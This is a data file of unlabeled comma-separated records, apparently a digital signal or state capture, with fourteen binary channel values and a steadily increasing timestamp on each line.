1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8336900e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8336940e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8336964e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8336992e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8337016e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8337068e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8337092e-02 1,1,0,1,1,0,0,0,0,1,0,0,0,0,1.8337096e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,1.8337100e-02 1,1,0,1,1,1,0,0,0,1,0,0,1,0,1.8337116e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,1.8337140e-02 1,1,0,1,1,1,0,0,0,1,0,0,1,0,1.8337164e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,1.8337192e-02 1,1,0,1,1,1,0,0,0,1,0,0,1,0,1.8337216e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,1.8337244e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8337248e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8337292e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8337316e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,1.8337324e-02 1,1,0,1,1,1,0,0,0,1,0,0,1,0,1.8337368e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,1.8337392e-02 1,1,0,1,1,1,0,0,0,0,0,0,0,0,1.8337396e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8337400e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8337416e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8337444e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8337468e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8337492e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8337516e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8337544e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8337592e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8337616e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,1.8337620e-02 1,1,0,1,1,1,0,0,0,1,0,0,1,0,1.8337668e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,1.8337692e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8337700e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8337740e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8337764e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8337792e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8337816e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8337844e-02 1,1,0,1,1,0,0,0,0,1,0,0,0,0,1.8337868e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,1.8337872e-02 1,1,0,1,1,1,0,0,0,1,0,0,1,0,1.8337892e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,1.8337916e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8337924e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8337968e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8337992e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,1.8337996e-02 1,1,0,1,1,1,0,0,0,1,0,0,1,0,1.8338016e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,1.8338044e-02 1,1,0,1,1,1,0,0,0,1,0,0,1,0,1.8338068e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,1.8338092e-02 1,1,0,1,1,1,0,0,0,1,0,0,1,0,1.8338116e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,1.8338140e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8338148e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8338192e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8338216e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8338244e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8338268e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,1.8338272e-02 1,1,0,1,1,1,0,0,0,1,0,0,1,0,1.8338316e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,1.8338340e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8338348e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8338392e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8338416e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,1.8338420e-02 1,1,0,1,1,1,0,0,0,1,0,0,1,0,1.8338444e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,1.8338468e-02 1,1,0,1,1,1,0,0,0,1,0,0,1,0,1.8338492e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,1.8338516e-02 1,1,0,1,1,1,0,0,0,1,0,0,1,0,1.8338540e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,1.8338564e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8338572e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8338620e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8338644e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8338668e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8338692e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8338740e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8338764e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,1.8338772e-02 1,1,0,1,1,1,0,0,0,1,0,0,1,0,1.8338792e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,1.8338816e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8338824e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8338844e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8338868e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8338892e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8338916e-02 1,1,0,1,1,0,0,0,0,1,0,0,0,0,1.8338920e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,1.8338924e-02 1,1,0,1,1,1,0,0,0,1,0,0,1,0,1.8338968e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,1.8338992e-02 1,1,0,1,1,1,0,0,0,0,0,0,0,0,1.8338996e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8339000e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8339016e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8339044e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8339068e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8339092e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,1.8339096e-02 1,1,0,1,1,1,0,0,0,1,0,0,1,0,1.8339116e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,1.8339140e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8339148e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8339192e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8339216e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,1.8339220e-02 1,1,0,1,1,1,0,0,0,1,0,0,1,0,1.8339244e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,1.8339268e-02 1,1,0,1,1,1,0,0,0,1,0,0,1,0,1.8339292e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,1.8339316e-02 1,1,0,1,1,1,0,0,0,1,0,0,1,0,1.8339340e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,1.8339364e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8339372e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8339420e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8339444e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8339468e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8339492e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8339516e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8339540e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8339564e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8339592e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8339616e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8339644e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8339668e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8339692e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8339716e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8339740e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8339764e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8339792e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8339816e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8339844e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8339868e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8339892e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8339916e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8339940e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8339964e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8339992e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8340016e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8340044e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8340068e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8340092e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8340116e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8340140e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8340164e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8340192e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8340216e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8340244e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8340268e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8340292e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8340316e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8340340e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8340364e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8340392e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8340416e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8340444e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8340468e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8340492e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8340516e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8340540e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8340564e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8340592e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8340616e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8340644e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8340668e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8340692e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8340716e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8340740e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8340764e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8340792e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8340816e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8340844e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8340868e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8340892e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8340916e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8340940e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8340964e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8340992e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8341016e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8341044e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8341068e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8341092e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8341116e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8341140e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8341164e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8341192e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8341216e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8341244e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8341268e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8341292e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8341316e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8341340e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8341364e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8341392e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8341416e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8341444e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8341468e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8341492e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8341516e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8341540e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8341564e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8341592e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8341616e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8341644e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8341668e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8341692e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8341716e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8341740e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8341764e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8341792e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8341816e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8341844e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8341868e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8341892e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8341916e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8341940e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8341964e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8341992e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8342016e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8342044e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8342068e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8342092e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8342116e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8342140e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8342164e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8342192e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8342216e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8342244e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8342268e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8342292e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8342316e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8342340e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8342364e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8342392e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8342416e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8342444e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8342468e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8342492e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8342516e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8342540e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8342564e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8342592e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8342616e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8342644e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8342668e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8342692e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.8342716e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.8342740e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,1,1.8467172e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,1,1.8467340e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,1,1.8467360e-02 0,0,1,1,1,0,0,0,0,0,0,1,0,1,1.8467396e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,1,1.8467416e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,1,1.8467720e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,1,1.8467744e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,1,1.8467748e-02 0,0,1,1,1,1,0,0,0,1,0,0,1,1,1.8467792e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,1,1.8467820e-02 0,0,1,1,1,1,0,0,0,0,0,0,0,1,1.8467824e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,1,1.8467828e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,1,1.8467844e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,1,1.8467868e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,1,1.8467916e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,1,1.8467940e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,1,1.8467964e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,1,1.8467992e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,1,1.8467996e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,1.8468004e-02 0,0,1,1,1,1,0,0,0,1,0,0,1,0,1.8468044e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,1.8468068e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8468076e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8468092e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8468116e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,1.8468124e-02 0,0,1,1,1,1,0,0,0,1,0,0,1,0,1.8468168e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,1.8468192e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8468200e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8468220e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8468244e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8468268e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8468292e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8468316e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8468340e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8468364e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8468392e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,1.8468396e-02 0,0,1,1,1,1,0,0,0,1,0,0,1,0,1.8468444e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,1.8468468e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8468476e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8468492e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8468516e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,1.8468524e-02 0,0,1,1,1,1,0,0,0,1,0,0,1,0,1.8468568e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,1.8468588e-02 0,0,1,1,1,1,0,0,0,1,0,0,1,0,1.8468612e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,1.8468640e-02 0,0,1,1,1,1,0,0,0,0,0,0,0,0,1.8468644e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8468648e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8468668e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8468692e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8468716e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8468740e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8468764e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8468788e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,1.8468796e-02 0,0,1,1,1,1,0,0,0,1,0,0,1,0,1.8468840e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,1.8468864e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8468872e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8468892e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8468916e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,1.8468920e-02 0,0,1,1,1,1,0,0,0,1,0,0,1,0,1.8468968e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,1.8468988e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8469000e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8469012e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8469040e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8469064e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8469092e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8469116e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8469140e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,1.8469144e-02 0,0,1,1,1,1,0,0,0,1,0,0,1,0,1.8469164e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,1.8469188e-02 0,0,1,1,1,1,0,0,0,1,0,0,1,0,1.8469240e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,1.8469264e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8469272e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8469292e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8469316e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8469340e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8469364e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8469388e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8469412e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,1.8469420e-02 0,0,1,1,1,1,0,0,0,1,0,0,1,0,1.8469440e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,1.8469464e-02 0,0,1,1,1,1,0,0,0,1,0,0,1,0,1.8469492e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,1.8469516e-02 0,0,1,1,1,1,0,0,0,1,0,0,1,0,1.8469540e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,1.8469564e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8469572e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8469612e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8469640e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8469664e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8469692e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8469716e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8469740e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,1.8469744e-02 0,0,1,1,1,1,0,0,0,1,0,0,1,0,1.8469788e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,1.8469812e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8469820e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8469840e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8469864e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8469892e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8469916e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8469940e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8469964e-02 0,0,1,1,1,0,0,0,0,1,0,0,0,0,1.8469968e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,1.8469972e-02 0,0,1,1,1,1,0,0,0,1,0,0,1,0,1.8469988e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,1.8470012e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8470020e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8470040e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8470064e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,1.8470068e-02 0,0,1,1,1,1,0,0,0,1,0,0,1,0,1.8470116e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,1.8470140e-02 0,0,1,1,1,1,0,0,0,1,0,0,1,0,1.8470164e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,1.8470188e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8470196e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8470212e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8470240e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8470264e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8470292e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8470316e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8470340e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,1.8470344e-02 0,0,1,1,1,1,0,0,0,1,0,0,1,0,1.8470388e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,1.8470412e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8470420e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8470440e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8470464e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,1.8470468e-02 0,0,1,1,1,1,0,0,0,1,0,0,1,0,1.8470516e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,1.8470540e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8470548e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8470564e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8470588e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8470612e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8470640e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8470664e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,1.8470692e-02 0,0,1,1,1,1,0,0,0,1,0,0,1,0,1.8470740e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,1.8470764e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8470772e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8470788e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8470812e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8470840e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8470864e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8470892e-02 0,0,1,1,1,0,0,0,0,1,0,0,0,0,1.8470916e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,1.8470920e-02 0,0,1,1,1,1,0,0,0,1,0,0,1,0,1.8470964e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,1.8470988e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8470996e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8471012e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8471040e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.8471064e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.8471092e-02 